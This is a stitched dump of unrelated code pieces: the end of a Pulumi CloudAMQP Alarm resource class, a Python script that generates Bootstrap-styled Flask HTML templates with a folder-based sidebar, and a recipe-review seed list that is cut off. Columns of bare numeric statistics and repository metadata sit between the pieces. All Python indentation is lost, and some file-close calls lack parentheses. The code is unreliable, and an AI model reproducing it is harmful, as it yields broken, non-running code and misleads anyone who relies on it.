__props__.__dict__["queue_regex"] = queue_regex
if recipients is None and not opts.urn:
raise TypeError("Missing required property 'recipients'")
__props__.__dict__["recipients"] = recipients
__props__.__dict__["time_threshold"] = time_threshold
if type is None and not opts.urn:
raise TypeError("Missing required property 'type'")
__props__.__dict__["type"] = type
__props__.__dict__["value_threshold"] = value_threshold
__props__.__dict__["vhost_regex"] = vhost_regex
super(Alarm, __self__).__init__(
'cloudamqp:index/alarm:Alarm',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
enabled: Optional[pulumi.Input[bool]] = None,
instance_id: Optional[pulumi.Input[int]] = None,
message_type: Optional[pulumi.Input[str]] = None,
queue_regex: Optional[pulumi.Input[str]] = None,
recipients: Optional[pulumi.Input[Sequence[pulumi.Input[int]]]] = None,
time_threshold: Optional[pulumi.Input[int]] = None,
type: Optional[pulumi.Input[str]] = None,
value_threshold: Optional[pulumi.Input[int]] = None,
vhost_regex: Optional[pulumi.Input[str]] = None) -> 'Alarm':
"""
Get an existing Alarm resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] enabled: Enable or disable the alarm to trigger.
:param pulumi.Input[int] instance_id: The CloudAMQP instance ID.
:param pulumi.Input[str] message_type: Message type `(total, unacked, ready)` used by queue alarm type.
:param pulumi.Input[str] queue_regex: Regex for which queue to check.
:param pulumi.Input[Sequence[pulumi.Input[int]]] recipients: Identifier for recipient to be notified. Leave empty to notify all recipients.
:param pulumi.Input[int] time_threshold: The time interval (in seconds) the `value_threshold` should be active before triggering an alarm.
:param pulumi.Input[str] type: The alarm type, see valid options below.
:param pulumi.Input[int] value_threshold: The value to trigger the alarm for.
:param pulumi.Input[str] vhost_regex: Regex for which vhost to check
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _AlarmState.__new__(_AlarmState)
__props__.__dict__["enabled"] = enabled
__props__.__dict__["instance_id"] = instance_id
__props__.__dict__["message_type"] = message_type
__props__.__dict__["queue_regex"] = queue_regex
__props__.__dict__["recipients"] = recipients
__props__.__dict__["time_threshold"] = time_threshold
__props__.__dict__["type"] = type
__props__.__dict__["value_threshold"] = value_threshold
__props__.__dict__["vhost_regex"] = vhost_regex
return Alarm(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[bool]:
"""
Enable or disable the alarm to trigger.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="instanceId")
def instance_id(self) -> pulumi.Output[int]:
"""
The CloudAMQP instance ID.
"""
return pulumi.get(self, "instance_id")
@property
@pulumi.getter(name="messageType")
def message_type(self) -> pulumi.Output[Optional[str]]:
"""
Message type `(total, unacked, ready)` used by queue alarm type.
"""
return pulumi.get(self, "message_type")
@property
@pulumi.getter(name="queueRegex")
def queue_regex(self) -> pulumi.Output[Optional[str]]:
"""
Regex for which queue to check.
"""
return pulumi.get(self, "queue_regex")
@property
@pulumi.getter
def recipients(self) -> pulumi.Output[Sequence[int]]:
"""
Identifier for recipient to be notified. Leave empty to notify all recipients.
"""
return pulumi.get(self, "recipients")
@property
@pulumi.getter(name="timeThreshold")
def time_threshold(self) -> pulumi.Output[Optional[int]]:
"""
The time interval (in seconds) the `value_threshold` should be active before triggering an alarm.
"""
return pulumi.get(self, "time_threshold")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The alarm type, see valid options below.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="valueThreshold")
def value_threshold(self) -> pulumi.Output[Optional[int]]:
"""
The value to trigger the alarm for.
"""
return pulumi.get(self, "value_threshold")
@property
@pulumi.getter(name="vhostRegex")
def vhost_regex(self) -> pulumi.Output[Optional[str]]:
"""
Regex for which vhost to check
"""
return pulumi.get(self, "vhost_regex")
| 44.245819
| 341
| 0.640085
| 3,124
| 26,459
| 5.226312
| 0.075544
| 0.09028
| 0.080296
| 0.044466
| 0.898818
| 0.884486
| 0.8734
| 0.846879
| 0.841612
| 0.822074
| 0
| 0.006616
| 0.251635
| 26,459
| 597
| 342
| 44.319933
| 0.817938
| 0.369402
| 0
| 0.748447
| 1
| 0
| 0.092494
| 0.001776
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161491
| false
| 0.003106
| 0.015528
| 0
| 0.273292
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
12b1dedc6dafc45cacda1d8048f1067b7e1f65f3
| 21,802
|
py
|
Python
|
templateBuilder.py
|
OrientoNubo/Folder-based-WebBuilder
|
8ca353c3b92f856272084a82be981f9094449a24
|
[
"MIT"
] | 3
|
2021-11-24T12:27:06.000Z
|
2022-02-18T15:36:04.000Z
|
templateBuilder.py
|
OrientoNubo/Folder-based-WebBuilder
|
8ca353c3b92f856272084a82be981f9094449a24
|
[
"MIT"
] | null | null | null |
templateBuilder.py
|
OrientoNubo/Folder-based-WebBuilder
|
8ca353c3b92f856272084a82be981f9094449a24
|
[
"MIT"
] | null | null | null |
#coding:utf-8
import os
from folderReader import traverseDIR
from bs4 import BeautifulSoup
# <li><a href="#" class="link-dark rounded">Pages Count: ?</a></li>
# print(src)
def htmlBuilderIndex():
src = traverseDIR()
htmlSample = '''
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<style></style>
<body></body>
</html>
'''
soup = BeautifulSoup(htmlSample, 'html.parser')
# Constitute::html:head
headSoup = soup.head
tag = soup.new_tag("link", rel="stylesheet", href=".{{url_for('static', filename='css/bootstrap.min.css') }}")
headSoup.append("")
headSoup.append(tag)
tag = soup.new_tag("link", rel="stylesheet", href=".{{url_for('static', filename='css/sidebars.css') }}")
headSoup.append("\n")
headSoup.append(tag)
tag = soup.new_tag("title")
headSoup.append("\n")
headSoup.append(tag)
headSoup.title.string = "{% block title %}{% endblock %} | SHARK"
# print(soup.head)
# Constitute::html:style
styleSoup = soup.style
# print(styleSoup)
# Constitute:::html::body:header
headerSoup = soup.body
header = '''<header class="d-flex justify-content-center py-3">
<ul class="nav nav-pills">
<li class="nav-item"><a href="./" class="nav-link active" aria-current="page">Home</a></li>
<li class="nav-item"><a href="./posts.html" class="nav-link">Posts</a></li>
<li class="nav-item"><a href="./caption.html" class="nav-link">Caption</a></li>
<li class="nav-item"><a href="./links.html" class="nav-link">Links</a></li>
</ul>
</header>'''
headerSoup.append(BeautifulSoup(header, 'html.parser'))
# Constitute:::html::body:main
# bodySoup = soup.body
# tag = soup.new_tag("div")
# soup.body.insert(0, tag)
# tag['class'] = 'container'
# soup.body.div.insert(0, "\n")
mainSoup = soup.body
main_1 = ''' <div class="container">
<div class="row">
<div class="col-md-3" id="sidebar">
<div class="flex-shrink-0 p-3 bg-white">
<a href="/" class="d-flex align-items-center pb-3 mb-3 link-dark text-decoration-none border-bottom">
<svg class="bi me-2" width="30" height="24"><use xlink:href="#bootstrap"></use>
<span class="fs-5 fw-semibold"> </span>
</a>'''
# init
main_2_sidebarVar = ''''''
main_2_sidebarVar = main_2_sidebarVar + '<ul class="list-unstyled ps-0">'
# main sidebar line
for item in src[1][0]:
# print(item)
LEVEL_1 = item
LEVEL_1_ID = item + "-collapse"
LEVEL_1_ID_target = "#" + item + "-collapse"
LEVEL_2 = ''''''
for item2 in src[1][1]:
item2_upper = item2.split("/")[0]
item2_lower = item2.split("/")[1]
# print(item)
if item2_upper == item:
# print(item, item2_upper, item2_lower)
LEVEL_2 = LEVEL_2 + '''
<li><a href="./menu/''' + item2_upper + "/" + item2_lower + '''.html" class="link-dark rounded">
''' + item2_lower + '''
</a></li>
'''
# print("--------")
ndPagePath = "./templates/menu/" + item2_upper
isExist = os.path.exists(ndPagePath)
if not isExist:
os.makedirs(ndPagePath)
ndPageURL = "./templates/menu/" + item2_upper + "/" + item2_lower + ".html"
temp = open(ndPageURL,'w')
temp.close
main_2_sidebarVar = main_2_sidebarVar + '''
<li class="mb-1">
<button class="btn btn-toggle align-items-center rounded collapsed" data-bs-toggle="collapse" data-bs-target="''' + LEVEL_1_ID_target + '''" aria-expanded="false">
''' + LEVEL_1 + '''
</button>
<div class="collapse" id="''' + LEVEL_1_ID + '''">
''' + '''
<ul class="btn-toggle-nav list-unstyled fw-normal pb-1 small">
''' + LEVEL_2 + '''
</ul>
</div>
</li>
'''
# print(main_2_sidebarVar)
# analyze line
main_2_sidebarVar = main_2_sidebarVar + '''
<li class="border-top my-3"></li>
<li class="mb-1">
<button class="btn btn-toggle align-items-center rounded collapsed" data-bs-toggle="collapse" data-bs-target="#account-collapse" aria-expanded="false">
Analyze
</button>
<div class="collapse" id="account-collapse">
<ul class="btn-toggle-nav list-unstyled fw-normal pb-1 small">
<li><a href="#" class="link-dark rounded">Files Count: ''' + str(src[2]) + '''</a></li>
</ul>
</div>
</li>
</ul>'''
main_3 = ''' </div>
</div>
<div class="col-md" id="content">
{% block content %}
{% endblock %}
</div>
</div>
</div>'''
main = main_1 + main_2_sidebarVar + main_3
mainSoup.append(BeautifulSoup(main, "html.parser"))
# Constitute:::html::body:footer
bodySoup = soup.body
footer = '''<div id="footer">
<div class="container">
<footer class="d-flex flex-wrap justify-content-between align-items-center py-3 my-4 border-top">
<div class="col-md-12 d-flex align-items-center">
<span class="text-muted">© 2021 github.com/OrientoNubo/Folder-based-WebBuilder, repo</span>
</div>
</footer>
</div>
</div>'''
bodySoup.append(BeautifulSoup(footer, 'html.parser'))
bodySoup = soup.body
js ='''
<script src=".{{ url_for('static', filename='js/bootstrap.bundle.min.js') }}"></script>
<script src=".{{ url_for('static', filename='js/sidebars.js') }}"></script>
'''
bodySoup.append(BeautifulSoup(js, 'html.parser'))
template = open("./templates/template.html",'w')
template.write(soup.prettify())
template.close
def htmlBuilderPosts():
src = traverseDIR()
htmlSample = '''
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<style></style>
<body></body>
</html>
'''
soup = BeautifulSoup(htmlSample, 'html.parser')
# Constitute::html:head
headSoup = soup.head
tag = soup.new_tag("link", rel="stylesheet", href="..{{url_for('static', filename='css/bootstrap.min.css') }}")
headSoup.append("")
headSoup.append(tag)
tag = soup.new_tag("link", rel="stylesheet", href="..{{url_for('static', filename='css/sidebars.css') }}")
headSoup.append("\n")
headSoup.append(tag)
tag = soup.new_tag("title")
headSoup.append("\n")
headSoup.append(tag)
headSoup.title.string = "{% block title %}{% endblock %} | SHARK"
# print(soup.head)
# Constitute::html:style
styleSoup = soup.style
# print(styleSoup)
# Constitute:::html::body:header
headerSoup = soup.body
header = '''<header class="d-flex justify-content-center py-3">
<ul class="nav nav-pills">
<li class="nav-item"><a href="../" class="nav-link active" aria-current="page">Home</a></li>
<li class="nav-item"><a href="../posts.html" class="nav-link">Posts</a></li>
<li class="nav-item"><a href="../caption.html" class="nav-link">Caption</a></li>
<li class="nav-item"><a href="../links.html" class="nav-link">Links</a></li>
</ul>
</header>'''
headerSoup.append(BeautifulSoup(header, 'html.parser'))
# Constitute:::html::body:main
# bodySoup = soup.body
# tag = soup.new_tag("div")
# soup.body.insert(0, tag)
# tag['class'] = 'container'
# soup.body.div.insert(0, "\n")
mainSoup = soup.body
main_1 = ''' <div class="container">
<div class="row">
<div class="col-md-3" id="sidebar">
<div class="flex-shrink-0 p-3 bg-white">
<a href="/" class="d-flex align-items-center pb-3 mb-3 link-dark text-decoration-none border-bottom">
<svg class="bi me-2" width="30" height="24"><use xlink:href="#bootstrap"></use>
<span class="fs-5 fw-semibold"> </span>
</a>'''
# init
main_2_sidebarVar = ''''''
main_2_sidebarVar = main_2_sidebarVar + '<ul class="list-unstyled ps-0">'
# main sidebar line
for item in src[1][0]:
# print(item)
LEVEL_1 = item
LEVEL_1_ID = item + "-collapse"
LEVEL_1_ID_target = "#" + item + "-collapse"
LEVEL_2 = ''''''
for item2 in src[1][1]:
item2_upper = item2.split("/")[0]
item2_lower = item2.split("/")[1]
# print(item)
if item2_upper == item:
# print(item, item2_upper, item2_lower)
LEVEL_2 = LEVEL_2 + '''
<li><a href="../menu/''' + item2_upper + "/" + item2_lower + '''.html" class="link-dark rounded">
''' + item2_lower + '''
</a></li>
'''
# print("--------")
ndPagePath = "../templates/menu/" + item2_upper
isExist = os.path.exists(ndPagePath)
if not isExist:
os.makedirs(ndPagePath)
ndPageURL = "../templates/menu/" + item2_upper + "/" + item2_lower + ".html"
temp = open(ndPageURL,'w')
temp.close
main_2_sidebarVar = main_2_sidebarVar + '''
<li class="mb-1">
<button class="btn btn-toggle align-items-center rounded collapsed" data-bs-toggle="collapse" data-bs-target="''' + LEVEL_1_ID_target + '''" aria-expanded="false">
''' + LEVEL_1 + '''
</button>
<div class="collapse" id="''' + LEVEL_1_ID + '''">
''' + '''
<ul class="btn-toggle-nav list-unstyled fw-normal pb-1 small">
''' + LEVEL_2 + '''
</ul>
</div>
</li>
'''
# print(main_2_sidebarVar)
# analyze line
main_2_sidebarVar = main_2_sidebarVar + '''
<li class="border-top my-3"></li>
<li class="mb-1">
<button class="btn btn-toggle align-items-center rounded collapsed" data-bs-toggle="collapse" data-bs-target="#account-collapse" aria-expanded="false">
Analyze
</button>
<div class="collapse" id="account-collapse">
<ul class="btn-toggle-nav list-unstyled fw-normal pb-1 small">
<li><a href="#" class="link-dark rounded">Files Count: ''' + str(src[2]) + '''</a></li>
</ul>
</div>
</li>
</ul>'''
main_3 = ''' </div>
</div>
<div class="col-md" id="content">
{% block content %}
{% endblock %}
</div>
</div>
</div>'''
main = main_1 + main_2_sidebarVar + main_3
mainSoup.append(BeautifulSoup(main, "html.parser"))
# Constitute:::html::body:footer
bodySoup = soup.body
footer = '''<div id="footer">
<div class="container">
<footer class="d-flex flex-wrap justify-content-between align-items-center py-3 my-4 border-top">
<div class="col-md-12 d-flex align-items-center">
<span class="text-muted">© 2021 github.com/OrientoNubo/Folder-based-WebBuilder, repo</span>
</div>
</footer>
</div>
</div>'''
bodySoup.append(BeautifulSoup(footer, 'html.parser'))
bodySoup = soup.body
js ='''
<script src="..{{ url_for('static', filename='js/bootstrap.bundle.min.js') }}"></script>
<script src="..{{ url_for('static', filename='js/sidebars.js') }}"></script>
'''
bodySoup.append(BeautifulSoup(js, 'html.parser'))
template = open("./templates/template_posts.html",'w')
template.write(soup.prettify())
template.close
def htmlBuilderMenu():
src = traverseDIR()
htmlSample = '''
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<style></style>
<body></body>
</html>
'''
soup = BeautifulSoup(htmlSample, 'html.parser')
# Constitute::html:head
headSoup = soup.head
tag = soup.new_tag("link", rel="stylesheet", href="../..{{url_for('static', filename='css/bootstrap.min.css') }}")
headSoup.append("")
headSoup.append(tag)
tag = soup.new_tag("link", rel="stylesheet", href="../..{{url_for('static', filename='css/sidebars.css') }}")
headSoup.append("\n")
headSoup.append(tag)
tag = soup.new_tag("title")
headSoup.append("\n")
headSoup.append(tag)
headSoup.title.string = "{% block title %}{% endblock %} | SHARK"
# print(soup.head)
# Constitute::html:style
styleSoup = soup.style
# print(styleSoup)
# Constitute:::html::body:header
headerSoup = soup.body
header = '''<header class="d-flex justify-content-center py-3">
<ul class="nav nav-pills">
<li class="nav-item"><a href="../../" class="nav-link active" aria-current="page">Home</a></li>
<li class="nav-item"><a href="../../posts.html" class="nav-link">Posts</a></li>
<li class="nav-item"><a href="../../caption.html" class="nav-link">Caption</a></li>
<li class="nav-item"><a href="../../links.html" class="nav-link">Links</a></li>
</ul>
</header>'''
headerSoup.append(BeautifulSoup(header, 'html.parser'))
# Constitute:::html::body:main
# bodySoup = soup.body
# tag = soup.new_tag("div")
# soup.body.insert(0, tag)
# tag['class'] = 'container'
# soup.body.div.insert(0, "\n")
mainSoup = soup.body
main_1 = ''' <div class="container">
<div class="row">
<div class="col-md-3" id="sidebar">
<div class="flex-shrink-0 p-3 bg-white">
<a href="/" class="d-flex align-items-center pb-3 mb-3 link-dark text-decoration-none border-bottom">
<svg class="bi me-2" width="30" height="24"><use xlink:href="#bootstrap"></use>
<span class="fs-5 fw-semibold"> </span>
</a>'''
# init
main_2_sidebarVar = ''''''
main_2_sidebarVar = main_2_sidebarVar + '<ul class="list-unstyled ps-0">'
# main sidebar line
for item in src[1][0]:
# print(item)
LEVEL_1 = item
LEVEL_1_ID = item + "-collapse"
LEVEL_1_ID_target = "#" + item + "-collapse"
LEVEL_2 = ''''''
for item2 in src[1][1]:
item2_upper = item2.split("/")[0]
item2_lower = item2.split("/")[1]
# print(item)
if item2_upper == item:
# print(item, item2_upper, item2_lower)
LEVEL_2 = LEVEL_2 + '''
<li><a href="../../menu/''' + item2_upper + "/" + item2_lower + '''.html" class="link-dark rounded">
''' + item2_lower + '''
</a></li>
'''
# print("--------")
ndPagePath = "../../templates/menu/" + item2_upper
isExist = os.path.exists(ndPagePath)
if not isExist:
os.makedirs(ndPagePath)
ndPageURL = "../../templates/menu/" + item2_upper + "/" + item2_lower + ".html"
temp = open(ndPageURL,'w')
temp.close
main_2_sidebarVar = main_2_sidebarVar + '''
<li class="mb-1">
<button class="btn btn-toggle align-items-center rounded collapsed" data-bs-toggle="collapse" data-bs-target="''' + LEVEL_1_ID_target + '''" aria-expanded="false">
''' + LEVEL_1 + '''
</button>
<div class="collapse" id="''' + LEVEL_1_ID + '''">
''' + '''
<ul class="btn-toggle-nav list-unstyled fw-normal pb-1 small">
''' + LEVEL_2 + '''
</ul>
</div>
</li>
'''
# print(main_2_sidebarVar)
# analyze line
main_2_sidebarVar = main_2_sidebarVar + '''
<li class="border-top my-3"></li>
<li class="mb-1">
<button class="btn btn-toggle align-items-center rounded collapsed" data-bs-toggle="collapse" data-bs-target="#account-collapse" aria-expanded="false">
Analyze
</button>
<div class="collapse" id="account-collapse">
<ul class="btn-toggle-nav list-unstyled fw-normal pb-1 small">
<li><a href="#" class="link-dark rounded">Files Count: ''' + str(src[2]) + '''</a></li>
</ul>
</div>
</li>
</ul>'''
main_3 = ''' </div>
</div>
<div class="col-md" id="content">
{% block content %}
{% endblock %}
</div>
</div>
</div>'''
main = main_1 + main_2_sidebarVar + main_3
mainSoup.append(BeautifulSoup(main, "html.parser"))
# Constitute:::html::body:footer
bodySoup = soup.body
footer = '''<div id="footer">
<div class="container">
<footer class="d-flex flex-wrap justify-content-between align-items-center py-3 my-4 border-top">
<div class="col-md-12 d-flex align-items-center">
<span class="text-muted">© 2021 github.com/OrientoNubo/Folder-based-WebBuilder, repo</span>
</div>
</footer>
</div>
</div>'''
bodySoup.append(BeautifulSoup(footer, 'html.parser'))
bodySoup = soup.body
js ='''
<script src="../..{{ url_for('static', filename='js/bootstrap.bundle.min.js') }}"></script>
<script src="../..{{ url_for('static', filename='js/sidebars.js') }}"></script>
'''
bodySoup.append(BeautifulSoup(js, 'html.parser'))
template = open("./templates/template_menu.html",'w')
template.write(soup.prettify())
template.close
if __name__ == '__main__':
htmlBuilderIndex()
htmlBuilderPosts()
htmlBuilderMenu()
| 42.007707
| 203
| 0.447298
| 2,122
| 21,802
| 4.511781
| 0.088596
| 0.022561
| 0.042302
| 0.029768
| 0.977648
| 0.977648
| 0.977648
| 0.974828
| 0.970336
| 0.960727
| 0
| 0.016851
| 0.39845
| 21,802
| 518
| 204
| 42.088803
| 0.712924
| 0.064581
| 0
| 0.87766
| 0
| 0.087766
| 0.667881
| 0.104209
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007979
| false
| 0
| 0.007979
| 0
| 0.015957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
12b8476286d00259d739dd40e2972e3e8252bad7
| 69,661
|
py
|
Python
|
app/seeds/reviews.py
|
nikhilmenon2/Learn2Cook
|
8276c8d42e1476f32916952b105fa434d4c9abcc
|
[
"PostgreSQL",
"Unlicense",
"MIT"
] | 11
|
2021-02-26T19:11:31.000Z
|
2021-03-24T19:23:05.000Z
|
app/seeds/reviews.py
|
nikhilmenon2/Learn2Cook
|
8276c8d42e1476f32916952b105fa434d4c9abcc
|
[
"PostgreSQL",
"Unlicense",
"MIT"
] | null | null | null |
app/seeds/reviews.py
|
nikhilmenon2/Learn2Cook
|
8276c8d42e1476f32916952b105fa434d4c9abcc
|
[
"PostgreSQL",
"Unlicense",
"MIT"
] | null | null | null |
from app.models import db, Review
# Adds a demo location, you can add other locations here if you want
def seed_reviews():
db.session.bulk_insert_mappings(Review,
[
{
"overall": 5,
"review": "I have to keep trying to master this dish!",
"recipeId": 33,
"userId": 4
},
{
"overall": 4,
"review": "Whoever Wrote this is a genius!",
"recipeId": 26,
"userId": 10
},
{
"overall": 4,
"review": "I have to keep trying to master this dish!",
"recipeId": 33,
"userId": 4
},
{
"overall": 4,
"review": "My family loved this!",
"recipeId": 26,
"userId": 10
},
{
"overall": 4,
"review": "Whoever Wrote this is a genius!",
"recipeId": 14,
"userId": 9
},
{
"overall": 4,
"review": "This was totally great!",
"recipeId": 28,
"userId": 5
},
{
"overall": 4,
"review": "This was totally great!",
"recipeId": 41,
"userId": 3
},
{
"overall": 5,
"review": "I will always treasure this recipe",
"recipeId": 38,
"userId": 7
},
{
"overall": 3,
"review": "My family loved this!",
"recipeId": 14,
"userId": 3
},
{
"overall": 4,
"review": "This was totally great!",
"recipeId": 23,
"userId": 10
},
{
"overall": 5,
"review": "I have to keep trying to master this dish!",
"recipeId": 1,
"userId": 9
},
{
"overall": 4,
"review": "Awesome!",
"recipeId": 33,
"userId": 4
},
{
"overall": 5,
"review": "I loved this",
"recipeId": 49,
"userId": 4
},
{
"overall": 3,
"review": "Never tried this type of food before",
"recipeId": 22,
"userId": 4
},
{
"overall": 4,
"review": "I loved this",
"recipeId": 44,
"userId": 8
},
{
"overall": 3,
"review": "Awesome!",
"recipeId": 31,
"userId": 8
},
{
"overall": 5,
"review": "I loved this",
"recipeId": 16,
"userId": 3
},
{
"overall": 5,
"review": "Awesome!",
"recipeId": 1,
"userId": 6
},
{
"overall": 5,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 3,
"userId": 8
},
{
"overall": 4,
"review": "Whoever Wrote this is a genius!",
"recipeId": 5,
"userId": 9
},
{
"overall": 5,
"review": "This was totally great!",
"recipeId": 7,
"userId": 6
},
{
"overall": 4,
"review": "Never tried this type of food before",
"recipeId": 38,
"userId": 6
},
{
"overall": 3,
"review": "I followed along so easily!",
"recipeId": 19,
"userId": 7
},
{
"overall": 5,
"review": "This was totally great!",
"recipeId": 45,
"userId": 3
},
{
"overall": 4,
"review": "I followed along so easily!",
"recipeId": 16,
"userId": 7
},
{
"overall": 4,
"review": "Never tried this type of food before",
"recipeId": 12,
"userId": 8
},
{
"overall": 3,
"review": "Awesome!",
"recipeId": 26,
"userId": 3
},
{
"overall": 5,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 8,
"userId": 9
},
{
"overall": 5,
"review": "Never tried this type of food before",
"recipeId": 26,
"userId": 7
},
{
"overall": 4,
"review": "Whoever Wrote this is a genius!",
"recipeId": 22,
"userId": 8
},
{
"overall": 3,
"review": "I have to keep trying to master this dish!",
"recipeId": 43,
"userId": 4
},
{
"overall": 5,
"review": "Never tried this type of food before",
"recipeId": 9,
"userId": 7
},
{
"overall": 5,
"review": "I will always treasure this recipe",
"recipeId": 21,
"userId": 8
},
{
"overall": 4,
"review": "I loved this",
"recipeId": 48,
"userId": 4
},
{
"overall": 4,
"review": "This was totally great!",
"recipeId": 36,
"userId": 3
},
{
"overall": 5,
"review": "Awesome!",
"recipeId": 35,
"userId": 5
},
{
"overall": 5,
"review": "I have to keep trying to master this dish!",
"recipeId": 44,
"userId": 4
},
{
"overall": 3,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 43,
"userId": 5
},
{
"overall": 4,
"review": "Never tried this type of food before",
"recipeId": 2,
"userId": 7
},
{
"overall": 5,
"review": "This was totally great!",
"recipeId": 9,
"userId": 7
},
{
"overall": 4,
"review": "I followed along so easily!",
"recipeId": 40,
"userId": 7
},
{
"overall": 5,
"review": "Whoever Wrote this is a genius!",
"recipeId": 32,
"userId": 6
},
{
"overall": 4,
"review": "I loved this",
"recipeId": 9,
"userId": 10
},
{
"overall": 4,
"review": "My family loved this!",
"recipeId": 28,
"userId": 9
},
{
"overall": 5,
"review": "Awesome!",
"recipeId": 12,
"userId": 3
},
{
"overall": 3,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 32,
"userId": 5
},
{
"overall": 4,
"review": "I loved this",
"recipeId": 7,
"userId": 3
},
{
"overall": 5,
"review": "I will always treasure this recipe",
"recipeId": 8,
"userId": 8
},
{
"overall": 4,
"review": "I will always treasure this recipe",
"recipeId": 21,
"userId": 3
},
{
"overall": 5,
"review": "I loved this",
"recipeId": 42,
"userId": 8
},
{
"overall": 3,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 27,
"userId": 8
},
{
"overall": 5,
"review": "Awesome!",
"recipeId": 16,
"userId": 10
},
{
"overall": 5,
"review": "I will always treasure this recipe",
"recipeId": 33,
"userId": 7
},
{
"overall": 4,
"review": "I will always treasure this recipe",
"recipeId": 47,
"userId": 10
},
{
"overall": 3,
"review": "I have to keep trying to master this dish!",
"recipeId": 50,
"userId": 9
},
{
"overall": 3,
"review": "I loved this",
"recipeId": 38,
"userId": 9
},
{
"overall": 4,
"review": "I will always treasure this recipe",
"recipeId": 23,
"userId": 7
},
{
"overall": 4,
"review": "Never tried this type of food before",
"recipeId": 11,
"userId": 3
},
{
"overall": 5,
"review": "Never tried this type of food before",
"recipeId": 49,
"userId": 4
},
{
"overall": 4,
"review": "I followed along so easily!",
"recipeId": 29,
"userId": 10
},
{
"overall": 3,
"review": "Awesome!",
"recipeId": 13,
"userId": 6
},
{
"overall": 4,
"review": "I will always treasure this recipe",
"recipeId": 36,
"userId": 9
},
{
"overall": 3,
"review": "I will always treasure this recipe",
"recipeId": 30,
"userId": 8
},
{
"overall": 3,
"review": "I have to keep trying to master this dish!",
"recipeId": 24,
"userId": 5
},
{
"overall": 5,
"review": "I loved this",
"recipeId": 19,
"userId": 3
},
{
"overall": 5,
"review": "I have to keep trying to master this dish!",
"recipeId": 30,
"userId": 5
},
{
"overall": 4,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 22,
"userId": 6
},
{
"overall": 3,
"review": "I have to keep trying to master this dish!",
"recipeId": 28,
"userId": 8
},
{
"overall": 4,
"review": "Awesome!",
"recipeId": 47,
"userId": 6
},
{
"overall": 5,
"review": "Awesome!",
"recipeId": 13,
"userId": 9
},
{
"overall": 3,
"review": "This was totally great!",
"recipeId": 23,
"userId": 7
},
{
"overall": 4,
"review": "I will always treasure this recipe",
"recipeId": 49,
"userId": 8
},
{
"overall": 5,
"review": "Awesome!",
"recipeId": 19,
"userId": 6
},
{
"overall": 5,
"review": "I will always treasure this recipe",
"recipeId": 10,
"userId": 5
},
{
"overall": 5,
"review": "Whoever Wrote this is a genius!",
"recipeId": 29,
"userId": 5
},
{
"overall": 3,
"review": "Whoever Wrote this is a genius!",
"recipeId": 27,
"userId": 4
},
{
"overall": 5,
"review": "Never tried this type of food before",
"recipeId": 28,
"userId": 5
},
{
"overall": 4,
"review": "My family loved this!",
"recipeId": 48,
"userId": 8
},
{
"overall": 5,
"review": "My family loved this!",
"recipeId": 41,
"userId": 10
},
{
"overall": 4,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 2,
"userId": 5
},
{
"overall": 5,
"review": "Awesome!",
"recipeId": 36,
"userId": 6
},
{
"overall": 5,
"review": "I have to keep trying to master this dish!",
"recipeId": 33,
"userId": 7
},
{
"overall": 4,
"review": "This was totally great!",
"recipeId": 21,
"userId": 9
},
{
"overall": 4,
"review": "I loved this",
"recipeId": 1,
"userId": 9
},
{
"overall": 5,
"review": "My family loved this!",
"recipeId": 10,
"userId": 9
},
{
"overall": 5,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 32,
"userId": 4
},
{
"overall": 5,
"review": "I followed along so easily!",
"recipeId": 14,
"userId": 8
},
{
"overall": 4,
"review": "My family loved this!",
"recipeId": 48,
"userId": 9
},
{
"overall": 4,
"review": "Never tried this type of food before",
"recipeId": 7,
"userId": 5
},
{
"overall": 3,
"review": "I followed along so easily!",
"recipeId": 20,
"userId": 3
},
{
"overall": 4,
"review": "Awesome!",
"recipeId": 36,
"userId": 9
},
{
"overall": 4,
"review": "Whoever Wrote this is a genius!",
"recipeId": 16,
"userId": 6
},
{
"overall": 5,
"review": "I loved this",
"recipeId": 42,
"userId": 6
},
{
"overall": 3,
"review": "Whoever Wrote this is a genius!",
"recipeId": 15,
"userId": 9
},
{
"overall": 5,
"review": "I will always treasure this recipe",
"recipeId": 37,
"userId": 10
},
{
"overall": 5,
"review": "I have to keep trying to master this dish!",
"recipeId": 39,
"userId": 6
},
{
"overall": 5,
"review": "I followed along so easily!",
"recipeId": 28,
"userId": 8
},
{
"overall": 4,
"review": "I loved this",
"recipeId": 7,
"userId": 8
},
{
"overall": 4,
"review": "If you dont like this there is something wrong with you!",
"recipeId": 15,
"userId": 9
},
